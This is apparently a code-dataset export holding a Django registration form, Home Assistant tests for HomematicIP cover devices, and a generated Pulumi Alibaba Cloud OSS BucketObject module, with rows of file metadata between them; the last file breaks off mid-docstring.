| 27.285714 | 40 | 0.842932 | 26 | 191 | 5.884615 | 0.384615 | 0.509804 | 0.555556 | 0.326797 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125654 | 191 | 6 | 41 | 31.833333 | 0.916168 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
72617f40900ee6e4153ce0a9d6634fcf27d7bf84 | 224 | py | Python | accounts/forms.py | alaorneto/pratinhas | 699f9133fe952c767005c0a36d4531def836db8d | [
"MIT"
] | 1 | 2019-12-21T12:42:08.000Z | 2019-12-21T12:42:08.000Z | accounts/forms.py | alaorneto/pratinhas | 699f9133fe952c767005c0a36d4531def836db8d | [
"MIT"
] | 19 | 2020-06-05T20:17:14.000Z | 2021-09-29T23:39:28.000Z | accounts/forms.py | alaorneto/pratinhas | 699f9133fe952c767005c0a36d4531def836db8d | [
"MIT"
] | null | null | null | from django import forms
class RegisterForm(forms.Form):
username = forms.CharField(required=True, max_length=50)
email = forms.EmailField(required=True, max_length=75)
password = forms.CharField(required=True)
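# Hypothetical usage of the form above (view-side sketch; values are
# placeholders):
#
#     form = RegisterForm(data={"username": "alice",
#                               "email": "alice@example.com",
#                               "password": "s3cret"})
#     if form.is_valid():
#         username = form.cleaned_data["username"]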
| 32 | 60 | 0.763393 | 29 | 224 | 5.827586 | 0.62069 | 0.213018 | 0.260355 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020619 | 0.133929 | 224 | 6 | 61 | 37.333333 | 0.850515 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.2 | 0.2 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
728d60d5501628439dd59c8d642e8bdb16d2348a | 8,350 | py | Python | tests/components/homematicip_cloud/test_cover.py | itewk/home-assistant | 769cf19052f8c9ef374d8ba8ae7705ccc7bf4cf4 | [
"Apache-2.0"
] | 23 | 2017-11-15T21:03:53.000Z | 2021-03-29T21:33:48.000Z | tests/components/homematicip_cloud/test_cover.py | itewk/home-assistant | 769cf19052f8c9ef374d8ba8ae7705ccc7bf4cf4 | [
"Apache-2.0"
] | 6 | 2021-02-08T20:59:36.000Z | 2022-03-12T00:52:11.000Z | tests/components/homematicip_cloud/test_cover.py | itewk/home-assistant | 769cf19052f8c9ef374d8ba8ae7705ccc7bf4cf4 | [
"Apache-2.0"
] | 10 | 2018-01-01T00:12:51.000Z | 2021-12-21T23:08:05.000Z | """Tests for HomematicIP Cloud cover."""
from homematicip.base.enums import DoorCommand, DoorState
from homeassistant.components.cover import (
ATTR_CURRENT_POSITION,
ATTR_CURRENT_TILT_POSITION,
DOMAIN as COVER_DOMAIN,
)
from homeassistant.components.homematicip_cloud import DOMAIN as HMIPC_DOMAIN
from homeassistant.const import STATE_CLOSED, STATE_OPEN
from homeassistant.setup import async_setup_component
from .helper import async_manipulate_test_data, get_and_check_entity_basics
async def test_manually_configured_platform(hass):
"""Test that we do not set up an access point."""
assert (
await async_setup_component(
hass, COVER_DOMAIN, {COVER_DOMAIN: {"platform": HMIPC_DOMAIN}}
)
is True
)
assert not hass.data.get(HMIPC_DOMAIN)
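# The device tests below share one pattern: read the initial entity state,
# call a cover service, assert the last call recorded on the mocked
# HomematicIP device, then push simulated device data back with
# async_manipulate_test_data and re-check the Home Assistant state.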
async def test_hmip_cover_shutter(hass, default_mock_hap):
"""Test HomematicipCoverShutte."""
entity_id = "cover.sofa_links"
entity_name = "Sofa links"
device_model = "HmIP-FBL"
ha_state, hmip_device = get_and_check_entity_basics(
hass, default_mock_hap, entity_id, entity_name, device_model
)
assert ha_state.state == "closed"
assert ha_state.attributes["current_position"] == 0
assert ha_state.attributes["current_tilt_position"] == 0
service_call_counter = len(hmip_device.mock_calls)
await hass.services.async_call(
"cover", "open_cover", {"entity_id": entity_id}, blocking=True
)
assert len(hmip_device.mock_calls) == service_call_counter + 1
assert hmip_device.mock_calls[-1][0] == "set_shutter_level"
assert hmip_device.mock_calls[-1][1] == (0,)
await async_manipulate_test_data(hass, hmip_device, "shutterLevel", 0)
ha_state = hass.states.get(entity_id)
assert ha_state.state == STATE_OPEN
assert ha_state.attributes[ATTR_CURRENT_POSITION] == 100
assert ha_state.attributes[ATTR_CURRENT_TILT_POSITION] == 0
await hass.services.async_call(
"cover",
"set_cover_position",
{"entity_id": entity_id, "position": "50"},
blocking=True,
)
assert len(hmip_device.mock_calls) == service_call_counter + 3
assert hmip_device.mock_calls[-1][0] == "set_shutter_level"
assert hmip_device.mock_calls[-1][1] == (0.5,)
await async_manipulate_test_data(hass, hmip_device, "shutterLevel", 0.5)
ha_state = hass.states.get(entity_id)
assert ha_state.state == STATE_OPEN
assert ha_state.attributes[ATTR_CURRENT_POSITION] == 50
assert ha_state.attributes[ATTR_CURRENT_TILT_POSITION] == 0
await hass.services.async_call(
"cover", "close_cover", {"entity_id": entity_id}, blocking=True
)
assert len(hmip_device.mock_calls) == service_call_counter + 5
assert hmip_device.mock_calls[-1][0] == "set_shutter_level"
assert hmip_device.mock_calls[-1][1] == (1,)
await async_manipulate_test_data(hass, hmip_device, "shutterLevel", 1)
ha_state = hass.states.get(entity_id)
assert ha_state.state == STATE_CLOSED
assert ha_state.attributes[ATTR_CURRENT_POSITION] == 0
assert ha_state.attributes[ATTR_CURRENT_TILT_POSITION] == 0
await hass.services.async_call(
"cover", "stop_cover", {"entity_id": entity_id}, blocking=True
)
assert len(hmip_device.mock_calls) == service_call_counter + 7
assert hmip_device.mock_calls[-1][0] == "set_shutter_stop"
assert hmip_device.mock_calls[-1][1] == ()
await async_manipulate_test_data(hass, hmip_device, "shutterLevel", None)
ha_state = hass.states.get(entity_id)
assert ha_state.state == STATE_CLOSED
async def test_hmip_cover_slats(hass, default_mock_hap):
"""Test HomematicipCoverSlats."""
entity_id = "cover.sofa_links"
entity_name = "Sofa links"
device_model = "HmIP-FBL"
ha_state, hmip_device = get_and_check_entity_basics(
hass, default_mock_hap, entity_id, entity_name, device_model
)
assert ha_state.state == STATE_CLOSED
assert ha_state.attributes[ATTR_CURRENT_POSITION] == 0
assert ha_state.attributes[ATTR_CURRENT_TILT_POSITION] == 0
service_call_counter = len(hmip_device.mock_calls)
await hass.services.async_call(
"cover", "open_cover_tilt", {"entity_id": entity_id}, blocking=True
)
assert len(hmip_device.mock_calls) == service_call_counter + 1
assert hmip_device.mock_calls[-1][0] == "set_slats_level"
assert hmip_device.mock_calls[-1][1] == (0,)
await async_manipulate_test_data(hass, hmip_device, "shutterLevel", 0)
await async_manipulate_test_data(hass, hmip_device, "slatsLevel", 0)
ha_state = hass.states.get(entity_id)
assert ha_state.state == STATE_OPEN
assert ha_state.attributes[ATTR_CURRENT_POSITION] == 100
assert ha_state.attributes[ATTR_CURRENT_TILT_POSITION] == 100
await hass.services.async_call(
"cover",
"set_cover_tilt_position",
{"entity_id": entity_id, "tilt_position": "50"},
blocking=True,
)
assert len(hmip_device.mock_calls) == service_call_counter + 4
assert hmip_device.mock_calls[-1][0] == "set_slats_level"
assert hmip_device.mock_calls[-1][1] == (0.5,)
await async_manipulate_test_data(hass, hmip_device, "slatsLevel", 0.5)
ha_state = hass.states.get(entity_id)
assert ha_state.state == STATE_OPEN
assert ha_state.attributes[ATTR_CURRENT_POSITION] == 100
assert ha_state.attributes[ATTR_CURRENT_TILT_POSITION] == 50
await hass.services.async_call(
"cover", "close_cover_tilt", {"entity_id": entity_id}, blocking=True
)
assert len(hmip_device.mock_calls) == service_call_counter + 6
assert hmip_device.mock_calls[-1][0] == "set_slats_level"
assert hmip_device.mock_calls[-1][1] == (1,)
await async_manipulate_test_data(hass, hmip_device, "slatsLevel", 1)
ha_state = hass.states.get(entity_id)
assert ha_state.state == STATE_OPEN
assert ha_state.attributes[ATTR_CURRENT_POSITION] == 100
assert ha_state.attributes[ATTR_CURRENT_TILT_POSITION] == 0
await hass.services.async_call(
"cover", "stop_cover_tilt", {"entity_id": entity_id}, blocking=True
)
assert len(hmip_device.mock_calls) == service_call_counter + 8
assert hmip_device.mock_calls[-1][0] == "set_shutter_stop"
assert hmip_device.mock_calls[-1][1] == ()
await async_manipulate_test_data(hass, hmip_device, "shutterLevel", None)
ha_state = hass.states.get(entity_id)
assert ha_state.state == STATE_OPEN
async def test_hmip_garage_door_tormatic(hass, default_mock_hap):
"""Test HomematicipCoverShutte."""
entity_id = "cover.garage_door_module"
entity_name = "Garage Door Module"
device_model = "HmIP-MOD-TM"
ha_state, hmip_device = get_and_check_entity_basics(
hass, default_mock_hap, entity_id, entity_name, device_model
)
assert ha_state.state == "closed"
assert ha_state.attributes["current_position"] == 0
service_call_counter = len(hmip_device.mock_calls)
await hass.services.async_call(
"cover", "open_cover", {"entity_id": entity_id}, blocking=True
)
assert len(hmip_device.mock_calls) == service_call_counter + 1
assert hmip_device.mock_calls[-1][0] == "send_door_command"
assert hmip_device.mock_calls[-1][1] == (DoorCommand.OPEN,)
await async_manipulate_test_data(hass, hmip_device, "doorState", DoorState.OPEN)
ha_state = hass.states.get(entity_id)
assert ha_state.state == STATE_OPEN
assert ha_state.attributes[ATTR_CURRENT_POSITION] == 100
await hass.services.async_call(
"cover", "close_cover", {"entity_id": entity_id}, blocking=True
)
assert len(hmip_device.mock_calls) == service_call_counter + 3
assert hmip_device.mock_calls[-1][0] == "send_door_command"
assert hmip_device.mock_calls[-1][1] == (DoorCommand.CLOSE,)
await async_manipulate_test_data(hass, hmip_device, "doorState", DoorState.CLOSED)
ha_state = hass.states.get(entity_id)
assert ha_state.state == STATE_CLOSED
assert ha_state.attributes[ATTR_CURRENT_POSITION] == 0
await hass.services.async_call(
"cover", "stop_cover", {"entity_id": entity_id}, blocking=True
)
assert len(hmip_device.mock_calls) == service_call_counter + 5
assert hmip_device.mock_calls[-1][0] == "send_door_command"
assert hmip_device.mock_calls[-1][1] == (DoorCommand.STOP,)
| 41.336634 | 86 | 0.722635 | 1,157 | 8,350 | 4.858254 | 0.089023 | 0.088952 | 0.089664 | 0.121687 | 0.86924 | 0.845223 | 0.845223 | 0.841131 | 0.825832 | 0.806084 | 0 | 0.01565 | 0.165868 | 8,350 | 201 | 87 | 41.542289 | 0.791386 | 0.004072 | 0 | 0.622754 | 0 | 0 | 0.100613 | 0.008333 | 0 | 0 | 0 | 0 | 0.401198 | 1 | 0 | false | 0 | 0.035928 | 0 | 0.035928 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
72a1f90512c688c3ad6e9be62021090e17827b1f | 40,479 | py | Python | sdk/python/pulumi_alicloud/oss/bucket_object.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 42 | 2019-03-18T06:34:37.000Z | 2022-03-24T07:08:57.000Z | sdk/python/pulumi_alicloud/oss/bucket_object.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 152 | 2019-04-15T21:03:44.000Z | 2022-03-29T18:00:57.000Z | sdk/python/pulumi_alicloud/oss/bucket_object.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 3 | 2020-08-26T17:30:07.000Z | 2021-07-05T01:37:45.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['BucketObjectArgs', 'BucketObject']
@pulumi.input_type
class BucketObjectArgs:
def __init__(__self__, *,
bucket: pulumi.Input[str],
key: pulumi.Input[str],
acl: Optional[pulumi.Input[str]] = None,
cache_control: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
content_disposition: Optional[pulumi.Input[str]] = None,
content_encoding: Optional[pulumi.Input[str]] = None,
content_md5: Optional[pulumi.Input[str]] = None,
content_type: Optional[pulumi.Input[str]] = None,
expires: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
server_side_encryption: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a BucketObject resource.
:param pulumi.Input[str] bucket: The name of the bucket to put the file in.
:param pulumi.Input[str] key: The name of the object once it is in the bucket.
:param pulumi.Input[str] acl: The [canned ACL](https://www.alibabacloud.com/help/doc-detail/52284.htm) to apply. Defaults to "private".
:param pulumi.Input[str] cache_control: Specifies caching behavior along the request/reply chain. Read [RFC2616 Cache-Control](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content: The literal content being uploaded to the bucket.
:param pulumi.Input[str] content_disposition: Specifies presentational information for the object. Read [RFC2616 Content-Disposition](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content_encoding: Specifies what content encodings have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [RFC2616 Content-Encoding](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content_md5: The MD5 value of the content. Read [MD5](https://www.alibabacloud.com/help/doc-detail/31978.htm) for the computation method.
:param pulumi.Input[str] content_type: A standard MIME type describing the format of the object data, e.g. application/octet-stream. Any valid MIME type is accepted for this input.
:param pulumi.Input[str] expires: Specifies the expiry date for the request/response. Read [RFC2616 Expires](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] kms_key_id: Specifies the primary key managed by KMS. This parameter is valid when the value of `server_side_encryption` is set to KMS.
:param pulumi.Input[str] server_side_encryption: Specifies server-side encryption of the object in OSS. Valid values are `AES256`, `KMS`. Default value is `AES256`.
:param pulumi.Input[str] source: The path to the source file being uploaded to the bucket.
"""
pulumi.set(__self__, "bucket", bucket)
pulumi.set(__self__, "key", key)
if acl is not None:
pulumi.set(__self__, "acl", acl)
if cache_control is not None:
pulumi.set(__self__, "cache_control", cache_control)
if content is not None:
pulumi.set(__self__, "content", content)
if content_disposition is not None:
pulumi.set(__self__, "content_disposition", content_disposition)
if content_encoding is not None:
pulumi.set(__self__, "content_encoding", content_encoding)
if content_md5 is not None:
pulumi.set(__self__, "content_md5", content_md5)
if content_type is not None:
pulumi.set(__self__, "content_type", content_type)
if expires is not None:
pulumi.set(__self__, "expires", expires)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if server_side_encryption is not None:
pulumi.set(__self__, "server_side_encryption", server_side_encryption)
if source is not None:
pulumi.set(__self__, "source", source)
@property
@pulumi.getter
def bucket(self) -> pulumi.Input[str]:
"""
The name of the bucket to put the file in.
"""
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: pulumi.Input[str]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
The name of the object once it is in the bucket.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def acl(self) -> Optional[pulumi.Input[str]]:
"""
The [canned ACL](https://www.alibabacloud.com/help/doc-detail/52284.htm) to apply. Defaults to "private".
"""
return pulumi.get(self, "acl")
@acl.setter
def acl(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "acl", value)
@property
@pulumi.getter(name="cacheControl")
def cache_control(self) -> Optional[pulumi.Input[str]]:
"""
Specifies caching behavior along the request/reply chain. Read [RFC2616 Cache-Control](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "cache_control")
@cache_control.setter
def cache_control(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cache_control", value)
@property
@pulumi.getter
def content(self) -> Optional[pulumi.Input[str]]:
"""
The literal content being uploaded to the bucket.
"""
return pulumi.get(self, "content")
@content.setter
def content(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content", value)
@property
@pulumi.getter(name="contentDisposition")
def content_disposition(self) -> Optional[pulumi.Input[str]]:
"""
Specifies presentational information for the object. Read [RFC2616 Content-Disposition](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "content_disposition")
@content_disposition.setter
def content_disposition(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_disposition", value)
@property
@pulumi.getter(name="contentEncoding")
def content_encoding(self) -> Optional[pulumi.Input[str]]:
"""
Specifies what content encodings have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [RFC2616 Content-Encoding](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "content_encoding")
@content_encoding.setter
def content_encoding(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_encoding", value)
@property
@pulumi.getter(name="contentMd5")
def content_md5(self) -> Optional[pulumi.Input[str]]:
"""
The MD5 value of the content. Read [MD5](https://www.alibabacloud.com/help/doc-detail/31978.htm) for the computation method.
"""
return pulumi.get(self, "content_md5")
@content_md5.setter
def content_md5(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_md5", value)
@property
@pulumi.getter(name="contentType")
def content_type(self) -> Optional[pulumi.Input[str]]:
"""
A standard MIME type describing the format of the object data, e.g. application/octet-stream. Any valid MIME type is accepted for this input.
"""
return pulumi.get(self, "content_type")
@content_type.setter
def content_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_type", value)
@property
@pulumi.getter
def expires(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the expiry date for the request/response. Read [RFC2616 Expires](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "expires")
@expires.setter
def expires(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "expires", value)
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the primary key managed by KMS. This parameter is valid when the value of `server_side_encryption` is set to KMS.
"""
return pulumi.get(self, "kms_key_id")
@kms_key_id.setter
def kms_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_id", value)
@property
@pulumi.getter(name="serverSideEncryption")
def server_side_encryption(self) -> Optional[pulumi.Input[str]]:
"""
Specifies server-side encryption of the object in OSS. Valid values are `AES256`, `KMS`. Default value is `AES256`.
"""
return pulumi.get(self, "server_side_encryption")
@server_side_encryption.setter
def server_side_encryption(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_side_encryption", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input[str]]:
"""
The path to the source file being uploaded to the bucket.
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source", value)
@pulumi.input_type
class _BucketObjectState:
def __init__(__self__, *,
acl: Optional[pulumi.Input[str]] = None,
bucket: Optional[pulumi.Input[str]] = None,
cache_control: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
content_disposition: Optional[pulumi.Input[str]] = None,
content_encoding: Optional[pulumi.Input[str]] = None,
content_length: Optional[pulumi.Input[str]] = None,
content_md5: Optional[pulumi.Input[str]] = None,
content_type: Optional[pulumi.Input[str]] = None,
etag: Optional[pulumi.Input[str]] = None,
expires: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
server_side_encryption: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
version_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering BucketObject resources.
:param pulumi.Input[str] acl: The [canned ACL](https://www.alibabacloud.com/help/doc-detail/52284.htm) to apply. Defaults to "private".
:param pulumi.Input[str] bucket: The name of the bucket to put the file in.
:param pulumi.Input[str] cache_control: Specifies caching behavior along the request/reply chain. Read [RFC2616 Cache-Control](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content: The literal content being uploaded to the bucket.
:param pulumi.Input[str] content_disposition: Specifies presentational information for the object. Read [RFC2616 Content-Disposition](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content_encoding: Specifies what content encodings have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [RFC2616 Content-Encoding](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content_length: The content length of the request.
:param pulumi.Input[str] content_md5: The MD5 value of the content. Read [MD5](https://www.alibabacloud.com/help/doc-detail/31978.htm) for the computation method.
:param pulumi.Input[str] content_type: A standard MIME type describing the format of the object data, e.g. application/octet-stream. Any valid MIME type is accepted for this input.
:param pulumi.Input[str] etag: The ETag generated for the object (an MD5 sum of the object content).
:param pulumi.Input[str] expires: Specifies the expiry date for the request/response. Read [RFC2616 Expires](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] key: The name of the object once it is in the bucket.
:param pulumi.Input[str] kms_key_id: Specifies the primary key managed by KMS. This parameter is valid when the value of `server_side_encryption` is set to KMS.
:param pulumi.Input[str] server_side_encryption: Specifies server-side encryption of the object in OSS. Valid values are `AES256`, `KMS`. Default value is `AES256`.
:param pulumi.Input[str] source: The path to the source file being uploaded to the bucket.
:param pulumi.Input[str] version_id: A unique version ID value for the object, if bucket versioning is enabled.
"""
if acl is not None:
pulumi.set(__self__, "acl", acl)
if bucket is not None:
pulumi.set(__self__, "bucket", bucket)
if cache_control is not None:
pulumi.set(__self__, "cache_control", cache_control)
if content is not None:
pulumi.set(__self__, "content", content)
if content_disposition is not None:
pulumi.set(__self__, "content_disposition", content_disposition)
if content_encoding is not None:
pulumi.set(__self__, "content_encoding", content_encoding)
if content_length is not None:
pulumi.set(__self__, "content_length", content_length)
if content_md5 is not None:
pulumi.set(__self__, "content_md5", content_md5)
if content_type is not None:
pulumi.set(__self__, "content_type", content_type)
if etag is not None:
pulumi.set(__self__, "etag", etag)
if expires is not None:
pulumi.set(__self__, "expires", expires)
if key is not None:
pulumi.set(__self__, "key", key)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if server_side_encryption is not None:
pulumi.set(__self__, "server_side_encryption", server_side_encryption)
if source is not None:
pulumi.set(__self__, "source", source)
if version_id is not None:
pulumi.set(__self__, "version_id", version_id)
@property
@pulumi.getter
def acl(self) -> Optional[pulumi.Input[str]]:
"""
The [canned ACL](https://www.alibabacloud.com/help/doc-detail/52284.htm) to apply. Defaults to "private".
"""
return pulumi.get(self, "acl")
@acl.setter
def acl(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "acl", value)
@property
@pulumi.getter
def bucket(self) -> Optional[pulumi.Input[str]]:
"""
The name of the bucket to put the file in.
"""
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter(name="cacheControl")
def cache_control(self) -> Optional[pulumi.Input[str]]:
"""
Specifies caching behavior along the request/reply chain. Read [RFC2616 Cache-Control](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "cache_control")
@cache_control.setter
def cache_control(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cache_control", value)
@property
@pulumi.getter
def content(self) -> Optional[pulumi.Input[str]]:
"""
The literal content being uploaded to the bucket.
"""
return pulumi.get(self, "content")
@content.setter
def content(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content", value)
@property
@pulumi.getter(name="contentDisposition")
def content_disposition(self) -> Optional[pulumi.Input[str]]:
"""
Specifies presentational information for the object. Read [RFC2616 Content-Disposition](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "content_disposition")
@content_disposition.setter
def content_disposition(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_disposition", value)
@property
@pulumi.getter(name="contentEncoding")
def content_encoding(self) -> Optional[pulumi.Input[str]]:
"""
Specifies what content encodings have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [RFC2616 Content-Encoding](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "content_encoding")
@content_encoding.setter
def content_encoding(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_encoding", value)
@property
@pulumi.getter(name="contentLength")
def content_length(self) -> Optional[pulumi.Input[str]]:
"""
The content length of the request.
"""
return pulumi.get(self, "content_length")
@content_length.setter
def content_length(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_length", value)
@property
@pulumi.getter(name="contentMd5")
def content_md5(self) -> Optional[pulumi.Input[str]]:
"""
The MD5 value of the content. Read [MD5](https://www.alibabacloud.com/help/doc-detail/31978.htm) for the computation method.
"""
return pulumi.get(self, "content_md5")
@content_md5.setter
def content_md5(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_md5", value)
@property
@pulumi.getter(name="contentType")
def content_type(self) -> Optional[pulumi.Input[str]]:
"""
A standard MIME type describing the format of the object data, e.g. application/octet-stream. Any valid MIME type is accepted for this input.
"""
return pulumi.get(self, "content_type")
@content_type.setter
def content_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_type", value)
@property
@pulumi.getter
def etag(self) -> Optional[pulumi.Input[str]]:
"""
The ETag generated for the object (an MD5 sum of the object content).
"""
return pulumi.get(self, "etag")
@etag.setter
def etag(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "etag", value)
@property
@pulumi.getter
def expires(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the expiry date for the request/response. Read [RFC2616 Expires](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "expires")
@expires.setter
def expires(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "expires", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
The name of the object once it is in the bucket.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the primary key managed by KMS. This parameter is valid when the value of `server_side_encryption` is set to KMS.
"""
return pulumi.get(self, "kms_key_id")
@kms_key_id.setter
def kms_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_id", value)
@property
@pulumi.getter(name="serverSideEncryption")
def server_side_encryption(self) -> Optional[pulumi.Input[str]]:
"""
Specifies server-side encryption of the object in OSS. Valid values are `AES256`, `KMS`. Default value is `AES256`.
"""
return pulumi.get(self, "server_side_encryption")
@server_side_encryption.setter
def server_side_encryption(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_side_encryption", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input[str]]:
"""
The path to the source file being uploaded to the bucket.
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source", value)
@property
@pulumi.getter(name="versionId")
def version_id(self) -> Optional[pulumi.Input[str]]:
"""
A unique version ID value for the object, if bucket versioning is enabled.
"""
return pulumi.get(self, "version_id")
@version_id.setter
def version_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version_id", value)
class BucketObject(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
acl: Optional[pulumi.Input[str]] = None,
bucket: Optional[pulumi.Input[str]] = None,
cache_control: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
content_disposition: Optional[pulumi.Input[str]] = None,
content_encoding: Optional[pulumi.Input[str]] = None,
content_md5: Optional[pulumi.Input[str]] = None,
content_type: Optional[pulumi.Input[str]] = None,
expires: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
server_side_encryption: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a resource to put an object (content or file) into an OSS bucket.
## Example Usage
### Uploading a file to a bucket
```python
import pulumi
import pulumi_alicloud as alicloud
object_source = alicloud.oss.BucketObject("object-source",
bucket="your_bucket_name",
key="new_object_key",
source="path/to/file")
```
### Uploading content to a bucket
```python
import pulumi
import pulumi_alicloud as alicloud
example = alicloud.oss.Bucket("example",
bucket="your_bucket_name",
acl="public-read")
object_content = alicloud.oss.BucketObject("object-content",
bucket=example.bucket,
key="new_object_key",
content="the content that you want to upload.")
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
